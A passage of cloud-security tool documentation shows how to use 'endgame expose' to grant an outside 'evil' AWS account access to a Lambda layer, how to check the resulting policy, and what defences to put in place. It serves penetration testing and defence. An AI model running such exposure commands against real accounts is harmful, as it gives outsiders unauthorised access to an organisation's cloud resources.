- To expose the resource using
endgame, run the following from the victim account:
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service lambda-layer --name test-resource-exposure:1- To view the contents of the Lambda layer policy, run the following:
export VICTIM_RESOURCE_ARN=arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure
export VERSION=3
aws lambda get-layer-version-policy \
--layer-name $VICTIM_RESOURCE_ARN \
--version-number $VERSION- Observe that the output of the overly permissive Lambda Layer Policy resembles the example shown below.
Observe that the Evil principal's account ID (999988887777) is given lambda:GetLayerVersion access to the Lambda layer arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1.
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"}]}",
"RevisionId": ""
}TODO
- Trusted Accounts Only: Ensure that Lambda Layers are only shared with trusted accounts.
- Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
- AWS Access Analyzer: Leverage AWS Access Analyzer to report on external access to Lambda Layers. See the AWS Access Analyzer documentation for more details.
- Restrict access to IAM permissions that could lead to exposure of your Lambda Layers: Tightly control access to the following IAM actions: - lambda:AddLayerVersionPermission: Grants permission to add permissions to the resource-based policy of a version of an AWS Lambda layer - lambda:GetLayerVersionPolicy: Grants permission to view the resource-based policy for a version of an AWS Lambda layer - lambda:ListFunctions: Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function - lambda:ListLayers: Grants permission to retrieve a list of AWS Lambda layers, with details about the latest version of each layer - lambda:ListLayerVersions: Grants permission to retrieve a list of versions of an AWS Lambda layer - lambda:RemoveLayerVersionPermission: Grants permission to remove a statement from the permissions policy for a version of an AWS Lambda layer
Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here